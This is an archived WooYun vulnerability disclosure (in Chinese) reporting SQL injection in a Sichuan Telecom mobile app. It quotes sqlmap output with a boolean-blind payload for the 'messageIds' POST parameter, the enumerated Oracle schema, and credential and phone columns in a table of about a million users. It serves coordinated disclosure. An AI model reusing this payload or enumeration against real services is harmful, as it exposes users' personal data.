当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0212836

漏洞标题:流流顺SQL注入漏洞(影响百万四川电信用户)

相关厂商:中国电信

漏洞作者: Chora

提交时间:2016-05-25 22:09

修复时间:2016-07-11 14:40

公开时间:2016-07-11 14:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-25: 细节已通知厂商并且等待厂商处理中
2016-05-27: 厂商已经确认,细节仅向厂商公开
2016-06-06: 细节向核心白帽子及相关领域专家公开
2016-06-16: 细节向普通白帽子公开
2016-06-26: 细节向实习白帽子公开
2016-07-11: 细节向公众公开

简要描述:

滴,老年卡。

详细说明:

基本是四川电信用户都知道流流顺这个APP。存在问题的地方在删除信息功能

1.jpg

2.png

漏洞证明:

POST parameter 'messageIds' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 83 HTTP(s) requests:
---
Parameter: messageIds (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: token=10D0C20E2A11DF7700D3FFE44604EF36AE6A0F24443F42CAD57E153DD9A0BE886DFB71ABA71DEC3A397B6F476B4A0AA0475824943C38B725&messageIds=150130320) AND 1670=1670 AND (5658=5658
---
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] SCWY
[*] SCWY_WEIXIN_1W
[*] SYS
[*] SYSTEM
[*] XDB
Database: SCWY
[151 tables]
+------------------------------+
| TD_SIGNIN_A?????             |
| INTF_AGENT_AREA              |
| INTF_AGENT_STAFF             |
| OMS_REPORT_SORT              |
| OMS_REP_ACTIVITY             |
| TD_ACTIVITY_SHOW_CONFIG      |
| TD_ACTIVITY_TARGET_USER      |
| TD_APP_GUESS                 |
| TD_BANK_LIST                 |
| TD_BUSI_NAME_LIST            |
| TD_CALL_INTERFACE_CONFIG     |
| TD_CITY                      |
| TD_CODE_INFO                 |
| TD_CONSUMPTION_CONFIG        |
| TD_CONTENT_CONFIG            |
| TD_CT_NBR_CONFIG             |
| TD_ECP_SHELF                 |
| TD_FLOW_RECOMMEND_CONFIG     |
| TD_GIVE_GOLD_CONFIG          |
| TD_GOLD_ACTIVITY_CONFIG      |
| TD_GOODS_RECOMMEND           |
| TD_GOODS_VOUCHER             |
| TD_HB_OCS_CONFIG             |
| TD_HW_SHOW_CONFIG            |
| TD_INTEGRAL_GOODS            |
| TD_JTFGOP_MAP                |
| TD_MAIN_ACTIVITY_CONFIG      |
| TD_MAIN_GOLDGAME_CONFIG      |
| TD_MAIN_MENU_CONFIG          |
| TD_NON_CANCEL_PROD           |
| TD_ORDER_ERROR_INFO          |
| TD_ORDER_GOODS_GOLD          |
| TD_SCENE_CONFIG              |
| TD_SHARE_CONTENT             |
| TD_SHARE_IMAGE               |
| TD_WINDOW_CONFIG             |
| TFA_APP_ORDER                |
| TF_CARDPAYMENT               |
| TL_GIVE_GOLD_LOG             |
| TL_GOLD_ANNOUNCEMENT_LOG     |
| TL_GOLD_DETAIL_SIGNIN        |
| TL_HW_SMS_CODE               |
| TL_LUCKYDRAW_CHANCE_LOG      |
| TL_SIGNIN_LOG                |
| TMP_GOLD_ORDER_COUNT         |
| TM_ACC_NBR_LIST              |
| TM_ACC_NBR_LIST2             |
| TM_ACC_NBR_LIST_RULE         |
| TM_ACC_NBR_LIST_RULE2        |
| TM_ACTIVE_USER_LIST          |
| TM_ACTIVITY                  |
| TM_ACTIVITY_LOG              |
| TM_ACTIVITY_LOG_TEMP         |
| TM_ACTIVITY_PRODUCT          |
| TM_ACTIVITY_RULE             |
| TM_APP_DATA_GATHER           |
| TM_APP_DOWNLOAD_LOG          |
| TM_APP_ERROR_LOG             |
| TM_APP_GROUP                 |
| TM_APP_INFO                  |
| TM_APP_PICTURE               |
| TM_BAIDU_CODE                |
| TM_CHANNEL                   |
| TM_CITY_MAP                  |
| TM_CUSTOMER                  |
| TM_CUSTOMER_TEMP             |
| TM_ECP_E9                    |
| TM_FAQ                       |
| TM_FIFA_APP                  |
| TM_FIFA_MATCH                |
| TM_FIFA_MATCH_RESULT         |
| TM_FIFA_MATCH_RESULT_LOG     |
| TM_FIFA_NEWS                 |
| TM_FIFA_RANK                 |
| TM_FIFA_RANK_RESULT          |
| TM_FIFA_TEAM                 |
| TM_FLOW_CONVERSION_GOODS     |
| TM_FLOW_CUSTOMER             |
| TM_FLOW_IMAGE                |
| TM_FLOW_ORDER_LOG_1507       |
| TM_FLOW_SUGGESTION           |
| TM_GOLDBAG_RECEIVE           |
| TM_GOLDBAG_SEND              |
| TM_GOLD_DETAIL               |
| TM_GOLD_GIVE_LOG             |
| TM_GOLD_GOODS                |
| TM_GOLD_ORDER                |
| TM_GOODS                     |
| TM_GOODS_CHANNEL             |
| TM_GOODS_GOLD                |
| TM_GOODS_PRICE               |
| TM_GOODS_SHELF               |
| TM_HD_TROPHY                 |
| TM_HOBBY_LABEL               |
| TM_HW_USER                   |
| TM_IOS_CERTIFICATE           |
| TM_LLS_GOODS_CONTRAST        |
| TM_MANAGEMENT_AUTHORITIES    |
| TM_MANAGEMENT_USER           |
| TM_MESSAGE_CODE              |
| TM_MESSAGE_LOG               |
| TM_MOBILE_LOGIN_BAK_201507   |
| TM_MOBILE_LOGIN_TEMP         |
| TM_NON_COACH_LIST            |
| TM_NON_COACH_LIST_TEMP       |
| TM_ORDER                     |
| TM_ORDER_E9_TEMP             |
| TM_ORDER_GOLD_RULE           |
| TM_ORDER_PKG_LIST            |
| TM_ORDER_VOUCHER_LOG         |
| TM_PRIZE                     |
| TM_PRIZE_LOG                 |
| TM_PRODUCT                   |
| TM_PRODUCT_SPECIFICATION     |
| TM_PROD_FEE                  |
| TM_PUSH_ACCOUNT_INFO         |
| TM_PUSH_CONFIG               |
| TM_PUSH_CUSTOMER             |
| TM_PUSH_CUSTOMER_RULE        |
| TM_PUSH_USER                 |
| TM_QUESTION_CONTENT          |
| TM_QUESTION_LIST             |
| TM_QUESTION_OPTION           |
| TM_QUESTION_RESULT           |
| TM_RANDOM_CODE_1507          |
| TM_SHARE_CONFIG              |
| TM_SHARE_LOG                 |
| TM_SHELF                     |
| TM_SHELF_COMPOSITION         |
| TM_SHORT_MESSAGE             |
| TM_SHORT_MESSAGE_RECORD      |
| TM_SMARTPHONE_LIST           |
| TM_STAFF_FEE_TOTAL_TMP       |
| TM_TARGET_USER               |
| TM_TASK_INFO                 |
| TM_TASK_INVITE_CODE          |
| TM_TASK_INVITE_DETAIL        |
| TM_TASK_PRIZE_LOG            |
| TM_TASK_RANK_SHOW            |
| TM_TASK_SHARE_CONFIG         |
| TM_TASK_TYPE                 |
| TM_TASK_USER                 |
| TM_TASK_VISIT_LOG_BAK_201507 |
| TM_TASK_VISIT_TYPE           |
| TM_USER_BASE_INFO            |
| TM_USER_GOLD                 |
| TM_USER_GOLD_DETAIL          |
| TM_USER_GOLD_TOTAL           |
| TM_USER_LOGIN_LOG            |
| TM_VERSION_UPGRADE           |
| TM_VERSION_UPGRADE_LOG       |
+------------------------------+
Table: TM_PUSH_USER
[10 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| ACTION       | VARCHAR2 |
| ACC_NBR      | VARCHAR2 |
| CHANNEL_ID   | VARCHAR2 |
| CREATE_TIME  | DATE     |
| CUSTOMER_ID  | NUMBER   |
| DEVICE_TOKEN | VARCHAR2 |
| ID           | NUMBER   |
| IOS_ANDROID  | VARCHAR2 |
| STATE        | VARCHAR2 |
| USER_ID      | VARCHAR2 |
+--------------+----------+
Database: SCWY
Table: TM_HW_USER
[7 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| CREATE_TIME     | DATE     |
| ID              | NUMBER   |
| INVITE_CODE     | VARCHAR2 |
| PASSWORD        | VARCHAR2 |
| PHONE           | VARCHAR2 |
| SECRET_PASSWORD | VARCHAR2 |
| SMS_PHONE       | VARCHAR2 |
+-----------------+----------+
Database: SCWY
+------------+---------+
| Table      | Entries |
+------------+---------+
| TM_HW_USER | 1034067 |
+------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 Chora@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-27 14:32

厂商回复:

CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无

漏洞评价:

评价

  1. 2016-05-26 01:14 | answer 认证白帽子 ( 普通白帽子 | Rank:453 漏洞数:54 | 答案)

    前排

  2. 2016-05-26 08:08 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    你关注的白帽子 Chora 发表了漏洞s 你关注的白帽子 Chora 发表了漏洞 流流顺SQL注入漏洞(影响百万四川电信用户)

  3. 2016-05-26 08:47 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1890 漏洞数:157 | 不要患得患失,我羡慕你,但是我还是选择做...)

    不是可以免费领流量么,怎么不多领点。

  4. 2016-05-26 09:13 | Chora 认证白帽子 ( 普通白帽子 | Rank:397 漏洞数:27 | 生存、生活、生命。)

    @小胖子 记得来看我,给我送饭。。。